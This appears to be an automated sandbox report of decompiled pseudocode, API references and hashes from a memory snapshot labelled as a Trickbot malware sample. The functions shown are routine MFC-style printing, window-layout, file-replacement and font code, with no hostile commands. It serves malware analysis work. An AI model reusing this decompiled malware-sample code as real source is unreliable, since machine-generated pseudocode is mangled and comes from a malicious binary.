                          0x00435589
                          0x0043558c
                          0x00435590
                          0x00435592
                          0x00435595
                          0x00435598
                          0x00435599
                          0x004355a7
                          0x004355ab
                          0x004355b1
                          0x004355b6
                          0x004355b9
                          0x00435612
                          0x00435613
                          0x0043561c
                          0x00435620
                          0x00435628
                          0x0043562c
                          0x00435637
                          0x0043563b
                          0x00435646
                          0x0043564a
                          0x00435652
                          0x00435656
                          0x0043565e
                          0x00435662
                          0x0043566a
                          0x0043566e
                          0x00435676
                          0x0043567a
                          0x00000000
                          0x004355bb
                          0x004355c1
                          0x004355c5
                          0x004355d0
                          0x004355d4
                          0x004355dc
                          0x004355e0
                          0x004355e8
                          0x004355ec
                          0x004355f4
                          0x004355f8
                          0x004355fd
                          0x00435601
                          0x00435601
                          0x004355b9
                          0x0043553c
                          0x00435ac1
                          0x00435ac9
                          0x00435acc
                          0x00435acc
                          0x004354af
                          0x004354b7
                          0x004354bf
                          0x00435500
                          0x00435500
                          0x00000000
                          0x004354c7
                          0x004354d4
                          0x004354dd
                          0x004354e0
                          0x004354e6
                          0x004354e9
                          0x004354ec
                          0x00000000
                          0x004354ee
                          0x004354ee
                          0x004354f0
                          0x004354f1
                          0x004354f6
                          0x004354f6
                          0x004354ec
                          0x004354bf
                          0x00435ad1
                          0x00435ad8
                          0x00435ae3
                          0x00435aeb

                          APIs
                          • __EH_prolog.LIBCMT ref: 00435482
                            • Part of subcall function 00435B9E: __EH_prolog.LIBCMT ref: 00435BA3
                            • Part of subcall function 0041877F: GetMessageTime.USER32 ref: 00418791
                            • Part of subcall function 0041877F: GetMessagePos.USER32 ref: 0041879A
                          • CreateDCA.GDI32(?,?,?,00000000), ref: 004354D4
                          • SetAbortProc.GDI32(?,Function_000352F9), ref: 0043579B
                          • UpdateWindow.USER32(?), ref: 0043583A
                          • StartDocA.GDI32(?,?), ref: 0043584F
                          • EndDoc.GDI32(?), ref: 00435A39
                            • Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
                          • String ID:
                          • API String ID: 900908304-0
                          • Opcode ID: e066b5225aa8885517185a7d3892ae13fb6812d348b5eeea089bd5190985030b
                          • Instruction ID: a0dd3e15bf6781a077e23ea59c2ef98f91582c7a5e74925b53bef0c7a4ac1d06
                          • Opcode Fuzzy Hash: e066b5225aa8885517185a7d3892ae13fb6812d348b5eeea089bd5190985030b
                          • Instruction Fuzzy Hash: 5F129C71D0021AEFDF14EFA5C985AEDBBB4BF18308F1040AEE405A3292DB785E44DB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00427857(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				struct tagRECT _v32;
                          				int _v36;
                          				signed int _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				long _v56;
                          				signed int _v60;
                          				void* _v64;
                          				intOrPtr _v68;
                          				intOrPtr* _v72;
                          				struct tagRECT _v88;
                          				struct tagRECT _v104;
                          				int _v136;
                          				char _v144;
                          				intOrPtr* _t191;
                          				intOrPtr _t197;
                          				signed int _t199;
                          				intOrPtr* _t205;
                          				intOrPtr _t213;
                          				signed int _t215;
                          				long _t218;
                          				signed int _t219;
                          				signed int _t225;
                          				void* _t229;
                          				intOrPtr* _t231;
                          				intOrPtr _t238;
                          				intOrPtr _t239;
                          				int _t244;
                          				signed int _t245;
                          				signed int _t249;
                          				signed int _t251;
                          				signed int _t256;
                          				long _t263;
                          				intOrPtr _t264;
                          				int _t269;
                          				signed int _t273;
                          				signed int _t277;
                          				long _t285;
                          				void* _t293;
                          				signed int _t294;
                          				signed int _t295;
                          				signed int _t299;
                          				intOrPtr _t305;
                          				long _t312;
                          				int _t322;
                          				long _t327;
                          				signed int _t333;
                          				intOrPtr _t336;
                          				RECT* _t341;
                          				signed int _t342;
                          				intOrPtr* _t343;
                          				int _t345;
                          
                          				_t293 = __ebx;
                          				_t336 = __ecx;
                          				_v68 = __ecx;
                          				_t191 = E00428D38( &_v64, _a8, _a12);
                          				_t341 = _t336 + 0x94;
                          				_v12 =  *_t191;
                          				_v8 =  *((intOrPtr*)(_t191 + 4));
                          				if(IsRectEmpty(_t341) != 0) {
                          					GetClientRect( *(E00419D7A(_t336) + 0x1c),  &_v88);
                          					_t197 = _v88.right - _v88.left;
                          					_t305 = _v88.bottom - _v88.top;
                          				} else {
                          					_t197 = _t341->right - _t341->left;
                          					_t305 = _t341->bottom - _t341->top;
                          				}
                          				_t342 = 0;
                          				_v48 = _t197;
                          				_v44 = _t305;
                          				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
                          					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
                          				} else {
                          					_v136 = 0;
                          				}
                          				_t199 =  *0x44b308; // 0x2
                          				_push(_t293);
                          				_t294 =  *0x44b30c; // 0x2
                          				_v40 = _t342;
                          				_t295 =  ~_t294;
                          				_v56 =  ~_t199;
                          				_v36 = _t342;
                          				_v16 = _t342;
                          				if( *(_t336 + 0x84) <= _t342) {
                          					L73:
                          					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
                          						EndDeferWindowPos(_v136);
                          					}
                          					SetRectEmpty( &_v104);
                          					E00429BAB(_t336,  &_v104, _a12);
                          					if(_a8 == _t342 || _a12 == _t342) {
                          						if(_v12 != _t342) {
                          							_v12 = _v12 + _v104.left - _v104.right;
                          						}
                          					}
                          					if(_a8 == _t342 || _a12 != _t342) {
                          						if(_v8 != _t342) {
                          							_v8 = _v8 + _v104.top - _v104.bottom;
                          						}
                          					}
                          					_t205 = _a4;
                          					 *_t205 = _v12;
                          					 *((intOrPtr*)(_t205 + 4)) = _v8;
                          					return _t205;
                          				} else {
                          					do {
                          						_t343 = E00427E85(_t336, _v16);
                          						_v72 = _t343;
                          						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
                          						if(_t343 == 0) {
                          							if(_t213 != 0) {
                          								goto L71;
                          							}
                          							L58:
                          							_t215 = _v40;
                          							if(_t215 != 0) {
                          								if(_a12 == 0) {
                          									_t312 = _v56 + _t215 -  *0x44b308;
                          									_v56 = _t312;
                          									if(_v12 <= _t312) {
                          										_v12 = _t312;
                          									}
                          									if(_v8 <= _t295) {
                          										_v8 = _t295;
                          									}
                          									_t299 =  *0x44b30c; // 0x2
                          									_t295 =  ~_t299;
                          								} else {
                          									_t295 = _t295 + _t215 -  *0x44b30c;
                          									_t218 = _v56;
                          									if(_v12 <= _t218) {
                          										_v12 = _t218;
                          									}
                          									if(_v8 <= _t295) {
                          										_v8 = _t295;
                          									}
                          									_t219 =  *0x44b308; // 0x2
                          									_v56 =  ~_t219;
                          								}
                          								_v40 = _v40 & 0x00000000;
                          							}
                          							goto L71;
                          						}
                          						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
                          							L51:
                          							if(_v36 != 0) {
                          								goto L71;
                          							}
                          							L52:
                          							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
                          							goto L71;
                          						}
                          						_t225 =  *(_t343 + 0x64);
                          						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
                          							asm("sbb eax, eax");
                          							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
                          						} else {
                          							_t229 = 6;
                          						}
                          						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
                          						_t327 = _v56;
                          						_v64 =  *_t231;
                          						_v60 =  *((intOrPtr*)(_t231 + 4));
                          						_v32.left = _t327;
                          						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
                          						_v32.right =  *_t231 + _t327;
                          						_v32.top = _t295;
                          						GetWindowRect( *(_t343 + 0x1c),  &_v88);
                          						E0042147E(_t336,  &_v88);
                          						_t322 = 0;
                          						if(_a12 == 0) {
                          							_t238 = _v88.top;
                          							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                          								OffsetRect( &_v32, 0, _t238 - _v32.top);
                          								_t322 = 0;
                          							}
                          							_t239 = _v32.bottom;
                          							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
                          								_t333 = _v44 - _t239 - _v32.top -  *0x44b30c;
                          								_t256 = _t333;
                          								if(_t333 <= _t295) {
                          									_t256 = _t295;
                          								}
                          								OffsetRect( &_v32, _t322, _t256 - _v32.top);
                          								_t322 = 0;
                          							}
                          							if(_v36 == _t322) {
                          								if(_v32.top < _v44 -  *0x44b30c) {
                          									goto L44;
                          								}
                          								_t249 = _v16;
                          								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                          									goto L44;
                          								} else {
                          									goto L56;
                          								}
                          							} else {
                          								_t251 =  *0x44b30c; // 0x2
                          								_v36 = _t322;
                          								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
                          								L44:
                          								_t244 = EqualRect( &_v32,  &_v88);
                          								if(_t244 == 0) {
                          									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                          										asm("movsd");
                          										asm("movsd");
                          										asm("movsd");
                          										asm("movsd");
                          										_t343 = _v72;
                          										_t336 = _v68;
                          									}
                          									E0041A3D0( &_v136,  *(_t343 + 0x1c),  &_v32);
                          								}
                          								_t245 = _v64;
                          								_t295 = _v32.top -  *0x44b30c + _v60;
                          								if(_v40 > _t245) {
                          									goto L52;
                          								} else {
                          									_v40 = _t245;
                          									goto L51;
                          								}
                          							}
                          						} else {
                          							_t263 = _v88.left;
                          							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                          								OffsetRect( &_v32, _t263 - _v32.left, 0);
                          								_t322 = 0;
                          							}
                          							_t264 = _v32.right;
                          							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
                          								L22:
                          								if(_v36 == _t322) {
                          									if(_v32.left < _v48 -  *0x44b308) {
                          										L27:
                          										_t269 = EqualRect( &_v32,  &_v88);
                          										if(_t269 == 0) {
                          											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												_t343 = _v72;
                          												_t336 = _v68;
                          											}
                          											E0041A3D0( &_v136,  *(_t343 + 0x1c),  &_v32);
                          										}
                          										_v56 = _v64 -  *0x44b308 + _v32.left;
                          										_t273 = _v60;
                          										if(_v40 <= _t273) {
                          											_v40 = _t273;
                          										}
                          										goto L52;
                          									}
                          									_t249 = _v16;
                          									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                          										goto L27;
                          									} else {
                          										L56:
                          										_t345 = 1;
                          										E00416B74(_t336 + 0x7c, _t249, _t322, _t345);
                          										_v36 = _t345;
                          										goto L58;
                          									}
                          								}
                          								_t277 =  *0x44b308; // 0x2
                          								_v36 = _t322;
                          								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
                          								goto L27;
                          							} else {
                          								_t285 = _v48 - _t264 -  *0x44b308 - _v32.left;
                          								if(_t285 <= _v56) {
                          									_t285 = _v56;
                          								}
                          								OffsetRect( &_v32, _t285 - _v32.left, _t322);
                          								_t322 = 0;
                          								goto L22;
                          							}
                          						}
                          						L71:
                          						_v16 = _v16 + 1;
                          					} while (_v16 <  *(_t336 + 0x84));
                          					_t342 = 0;
                          					goto L73;
                          				}
                          			}

                          0x00427857
                          0x00427868
                          0x0042786d
                          0x00427871
                          0x00427878
                          0x0042787f
                          0x00427885
                          0x00427890
                          0x004278ad
                          0x004278b9
                          0x004278bc
                          0x00427892
                          0x00427898
                          0x0042789a
                          0x0042789a
                          0x004278bf
                          0x004278c1
                          0x004278ca
                          0x004278cd
                          0x004278e3
                          0x004278cf
                          0x004278cf
                          0x004278cf
                          0x004278e9
                          0x004278ee
                          0x004278ef
                          0x004278f5
                          0x004278fa
                          0x00427902
                          0x00427905
                          0x00427908
                          0x0042790b
                          0x00427c71
                          0x00427c78
                          0x00427c88
                          0x00427c88
                          0x00427c92
                          0x00427ca1
                          0x00427ca9
                          0x00427cb3
                          0x00427cbb
                          0x00427cbb
                          0x00427cb3
                          0x00427cc1
                          0x00427ccb
                          0x00427cd3
                          0x00427cd3
                          0x00427ccb
                          0x00427cd6
                          0x00427cde
                          0x00427ce3
                          0x00427ce7
                          0x00427911
                          0x00427911
                          0x0042791e
                          0x00427926
                          0x0042792b
                          0x0042792e
                          0x00427bfd
                          0x00000000
                          0x00000000
                          0x00427bff
                          0x00427bff
                          0x00427c04
                          0x00427c0a
                          0x00427c3c
                          0x00427c41
                          0x00427c44
                          0x00427c46
                          0x00427c46
                          0x00427c4c
                          0x00427c4e
                          0x00427c4e
                          0x00427c51
                          0x00427c57
                          0x00427c0c
                          0x00427c12
                          0x00427c14
                          0x00427c1a
                          0x00427c1c
                          0x00427c1c
                          0x00427c22
                          0x00427c24
                          0x00427c24
                          0x00427c27
                          0x00427c2e
                          0x00427c2e
                          0x00427c59
                          0x00427c59
                          0x00000000
                          0x00427c04
                          0x00427940
                          0x00427b9b
                          0x00427b9f
                          0x00000000
                          0x00000000
                          0x00427ba5
                          0x00427bb0
                          0x00000000
                          0x00427bb0
                          0x00427946
                          0x0042794b
                          0x0042795d
                          0x00427961
                          0x00427951
                          0x00427953
                          0x00427953
                          0x00427972
                          0x0042797a
                          0x0042797d
                          0x00427983
                          0x0042798f
                          0x00427992
                          0x00427999
                          0x0042799f
                          0x004279a2
                          0x004279ae
                          0x004279b3
                          0x004279b8
                          0x00427ac5
                          0x00427acb
                          0x00427adb
                          0x00427ae1
                          0x00427ae1
                          0x00427ae3
                          0x00427ae9
                          0x00427afc
                          0x00427b00
                          0x00427b02
                          0x00427b04
                          0x00427b04
                          0x00427b0f
                          0x00427b15
                          0x00427b15
                          0x00427b1a
                          0x00427bc7
                          0x00000000
                          0x00000000
                          0x00427bcd
                          0x00427bd2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00427b20
                          0x00427b20
                          0x00427b32
                          0x00427b35
                          0x00427b3b
                          0x00427b43
                          0x00427b4b
                          0x00427b53
                          0x00427b67
                          0x00427b68
                          0x00427b69
                          0x00427b6a
                          0x00427b6b
                          0x00427b6e
                          0x00427b6e
                          0x00427b7f
                          0x00427b7f
                          0x00427b87
                          0x00427b90
                          0x00427b96
                          0x00000000
                          0x00427b98
                          0x00427b98
                          0x00000000
                          0x00427b98
                          0x00427b96
                          0x004279be
                          0x004279be
                          0x004279c4
                          0x004279d4
                          0x004279da
                          0x004279da
                          0x004279dc
                          0x004279e2
                          0x00427a12
                          0x00427a15
                          0x00427a40
                          0x00427a59
                          0x00427a61
                          0x00427a69
                          0x00427a71
                          0x00427a85
                          0x00427a86
                          0x00427a87
                          0x00427a88
                          0x00427a89
                          0x00427a8c
                          0x00427a8c
                          0x00427a9d
                          0x00427a9d
                          0x00427aae
                          0x00427ab1
                          0x00427ab7
                          0x00427abd
                          0x00427abd
                          0x00000000
                          0x00427ab7
                          0x00427a42
                          0x00427a47
                          0x00000000
                          0x00427be8
                          0x00427be8
                          0x00427bea
                          0x00427bf1
                          0x00427bf6
                          0x00000000
                          0x00427bf6
                          0x00427a47
                          0x00427a17
                          0x00427a1c
                          0x00427a2c
                          0x00000000
                          0x004279e9
                          0x004279f7
                          0x004279fc
                          0x004279fe
                          0x004279fe
                          0x00427a0a
                          0x00427a10
                          0x00000000
                          0x00427a10
                          0x004279e2
                          0x00427c5d
                          0x00427c5d
                          0x00427c63
                          0x00427c6f
                          0x00000000
                          0x00427c6f

                          APIs
                          • IsRectEmpty.USER32(?), ref: 00427888
                          • GetClientRect.USER32(?,?), ref: 004278AD
                          • BeginDeferWindowPos.USER32(?), ref: 004278DD
                          • GetWindowRect.USER32(?,?), ref: 004279A2
                          • OffsetRect.USER32(?,?,00000000), ref: 004279D4
                          • OffsetRect.USER32(?,?,00000000), ref: 00427A0A
                          • OffsetRect.USER32(?,00000002,00000000), ref: 00427A2C
                          • EqualRect.USER32(?,?), ref: 00427A61
                          • OffsetRect.USER32(?,00000000,?), ref: 00427ADB
                          • OffsetRect.USER32(?,00000000,?), ref: 00427B0F
                          • OffsetRect.USER32(?,00000000,?), ref: 00427B35
                          • EqualRect.USER32(?,?), ref: 00427B43
                          • EndDeferWindowPos.USER32(?), ref: 00427C88
                          • SetRectEmpty.USER32(?), ref: 00427C92
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                          • String ID:
                          • API String ID: 3160784657-0
                          • Opcode ID: 88b065c76850a793ed8992cb1a5aae329f2bc4b40bd6e93441250f948ee08b73
                          • Instruction ID: 1f0073370b9241fc8e12354876b96fe753e830e93c1beff061ce64f7269aabbd
                          • Opcode Fuzzy Hash: 88b065c76850a793ed8992cb1a5aae329f2bc4b40bd6e93441250f948ee08b73
                          • Instruction Fuzzy Hash: EBF11971E0562ADFCF14CFA9D984AAEBBB5FF08304F50812AE415E7215D738A941CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0041F315(intOrPtr __ecx) {
                          				void* __edi;
                          				void* __esi;
                          				void* _t60;
                          				CHAR* _t61;
                          				_Unknown_base(*)()* _t67;
                          				void* _t70;
                          				CHAR* _t73;
                          				short* _t79;
                          				CHAR* _t82;
                          				short* _t88;
                          				CHAR* _t91;
                          				void* _t112;
                          				long _t114;
                          				short* _t116;
                          				intOrPtr _t118;
                          				int _t122;
                          				int _t124;
                          				int _t126;
                          				void* _t127;
                          				void* _t129;
                          				void* _t130;
                          				short* _t133;
                          				intOrPtr _t135;
                          
                          				E00405340(E00437A5C, _t127);
                          				_t130 = _t129 - 0x20;
                          				_t118 = __ecx;
                          				_push(_t112);
                          				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
                          				E00417C3D(_t127 - 0x18, __ecx + 0xc);
                          				 *(_t127 - 4) = 0;
                          				E0041D323(_t118, _t112, _t118);
                          				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
                          					_t61 =  *0x447478; // 0x44748c
                          					_t114 = 0;
                          					 *(_t127 - 0x14) = _t61;
                          					_t135 =  *0x44b350; // 0x0
                          					 *(_t127 - 4) = 1;
                          					if(_t135 != 0) {
                          						L15:
                          						E0041D456( *(_t127 - 0x18));
                          						goto L16;
                          					} else {
                          						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
                          						_t136 = _t67;
                          						 *(_t127 - 0x2c) = _t67;
                          						if(_t67 == 0) {
                          							goto L15;
                          						} else {
                          							_push(0);
                          							_push( *(_t118 + 0x10));
                          							_push(_t127 - 0x28);
                          							_t70 = E0041F0AF(_t136);
                          							_t133 = _t130 + 0xc;
                          							 *(_t127 - 4) = 2;
                          							E00417FB5(_t127 - 0x14, _t127, _t70);
                          							_t111 = _t127 - 0x28;
                          							 *(_t127 - 4) = 1;
                          							E00417EC8(_t127 - 0x28);
                          							_t73 =  *(_t127 - 0x14);
                          							 *(_t127 - 0x10) = _t73;
                          							if(_t73 != 0) {
                          								_t122 = lstrlenA(_t73) + 1;
                          								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
                          								E00405B80(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
                          								_t79 = _t133;
                          								 *(_t127 - 0x24) = _t79;
                          								 *_t79 = 0;
                          								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
                          								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                          								 *(_t127 - 0x20) =  *(_t127 - 0x24);
                          							} else {
                          								 *(_t127 - 0x20) = 0;
                          							}
                          							_t82 =  *(_t118 + 0x10);
                          							 *(_t127 - 0x10) = _t82;
                          							if(_t82 != 0) {
                          								_t124 = lstrlenA(_t82) + 1;
                          								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
                          								E00405B80(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
                          								_t88 = _t133;
                          								 *(_t127 - 0x24) = _t88;
                          								 *_t88 = 0;
                          								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
                          								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                          							} else {
                          								 *(_t127 - 0x24) = 0;
                          							}
                          							_t91 =  *(_t127 - 0x18);
                          							 *(_t127 - 0x10) = _t91;
                          							if(_t91 != 0) {
                          								_t126 = lstrlenA(_t91) + 1;
                          								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
                          								E00405B80(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
                          								_t116 = _t133;
                          								 *_t116 = 0;
                          								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
                          								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                          							} else {
                          								_t116 = 0;
                          							}
                          							_push(0);
                          							_push(0);
                          							_push(3);
                          							_push( *(_t127 - 0x20));
                          							_push( *(_t127 - 0x24));
                          							_push(_t116);
                          							if( *(_t127 - 0x2c)() != 0) {
                          								E0041D456( *(_t127 - 0x14));
                          							} else {
                          								_t114 = GetLastError();
                          								if(_t114 == 0x498 || _t114 == 0) {
                          									goto L15;
                          								}
                          								L16:
                          								if(_t114 == 0x499) {
                          									E0041D456( *(_t127 - 0x14));
                          								}
                          								E0041D434( *(_t118 + 0x10),  *(_t127 - 0x18));
                          							}
                          						}
                          					}
                          					 *(_t127 - 4) = 0;
                          					E00417EC8(_t127 - 0x14);
                          				}
                          				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
                          				_t60 = E00417EC8(_t127 - 0x18);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
                          				return _t60;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041F31A
                            • Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52
                            • Part of subcall function 0041D323: CloseHandle.KERNEL32(00000001), ref: 0041D332
                            • Part of subcall function 0041D323: GetLastError.KERNEL32(00000000,0041D07A,?,?,0041D018), ref: 0041D357
                          • GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 0041F36D
                          • GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 0041F379
                            • Part of subcall function 0041F0AF: __EH_prolog.LIBCMT ref: 0041F0B4
                            • Part of subcall function 0041F0AF: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0041F0E7
                            • Part of subcall function 0041F0AF: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000), ref: 0041F10D
                            • Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC
                          • lstrlenA.KERNEL32(?,00000000), ref: 0041F3CA
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 0041F3ED
                          • lstrlenA.KERNEL32(?,?,00000001), ref: 0041F40C
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 0041F42F
                          • lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 0041F44D
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 0041F46D
                          • GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 0041F488
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
                          • String ID: KERNEL32$ReplaceFile
                          • API String ID: 3306742873-430465611
                          • Opcode ID: 51fa0806f288d9cea2b617045269ef476c02b59769565b2711e83aa8139b35fa
                          • Instruction ID: d7164ebacb032eaa6e0c0e8ab373f1155bf3d075358eb8877cc173b7cb90cad4
                          • Opcode Fuzzy Hash: 51fa0806f288d9cea2b617045269ef476c02b59769565b2711e83aa8139b35fa
                          • Instruction Fuzzy Hash: 905140B1D002199FCB10EFA5CD859EFBBB8FF18364B14056AE811B3291D7385E49CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0042F264(void* __edi, void* __esi) {
                          				void* _t28;
                          				void* _t31;
                          				void* _t42;
                          				int _t44;
                          				struct HFONT__* _t50;
                          				void* _t53;
                          				void* _t64;
                          				void* _t65;
                          				void* _t67;
                          				void* _t70;
                          				intOrPtr _t76;
                          				void* _t77;
                          				void* _t79;
                          				void* _t86;
                          
                          				_t67 = __esi;
                          				_t64 = __edi;
                          				_t28 = E00405340(E00438724, _t70);
                          				_t76 =  *0x44b35c; // 0x1
                          				if(_t76 != 0) {
                          					L21:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                          					return _t28;
                          				}
                          				E004330FA(0xa);
                          				_t77 =  *0x44b734; // 0x0
                          				if(_t77 == 0) {
                          					_t53 = LoadBitmapA( *(E00432562() + 0xc), 0x7912);
                          					 *0x44b734 = _t53;
                          					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
                          						 *0x44b728 =  *((intOrPtr*)(_t70 - 0x74));
                          						 *0x44b72c =  *((intOrPtr*)(_t70 - 0x70));
                          					}
                          				}
                          				_t79 =  *0x44b730; // 0x0
                          				if(_t79 != 0) {
                          					L11:
                          					_push(_t67);
                          					_push(_t64);
                          					_push(0);
                          					E004214F6(_t70 - 0x24, _t82);
                          					_t31 =  *0x44b730; // 0x0
                          					 *(_t70 - 4) = 0;
                          					if(_t31 == 0) {
                          						_t65 = 0;
                          						__eflags = 0;
                          					} else {
                          						_t65 = SelectObject( *(_t70 - 0x20), _t31);
                          					}
                          					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
                          					if(_t65 != 0) {
                          						SelectObject( *(_t70 - 0x20), _t65);
                          					}
                          					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
                          						L18:
                          						E00422700(0x44b730);
                          						goto L19;
                          					} else {
                          						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x44b72c; // 0x0
                          						if(_t86 <= 0) {
                          							L19:
                          							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
                          							E00421568(_t70 - 0x24,  *(_t70 - 4));
                          							goto L20;
                          						}
                          						goto L18;
                          					}
                          				} else {
                          					E00405360(_t70 - 0x60, 0, 0x3c);
                          					 *((char*)(_t70 - 0x49)) = 1;
                          					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
                          					_t42 = 1;
                          					 *(_t70 - 0x60) = _t42 -  *0x44b72c;
                          					_t44 = GetSystemMetrics(0x2a);
                          					_t80 = _t44;
                          					if(_t44 == 0) {
                          						_push("Small Fonts");
                          					} else {
                          						_push("Terminal");
                          					}
                          					lstrcpyA(_t70 - 0x44, ??);
                          					if(E00422546(_t80, 0xf233, _t70 - 0x60) == 0) {
                          						 *((char*)(_t70 - 0x45)) = 0x20;
                          					}
                          					_t50 = CreateFontIndirectA(_t70 - 0x60);
                          					_t82 = _t50;
                          					 *0x44b730 = _t50;
                          					if(_t50 == 0) {
                          						L20:
                          						_t28 = E0043316A(0xa);
                          						goto L21;
                          					} else {
                          						goto L11;
                          					}
                          				}
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042F269
                            • Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
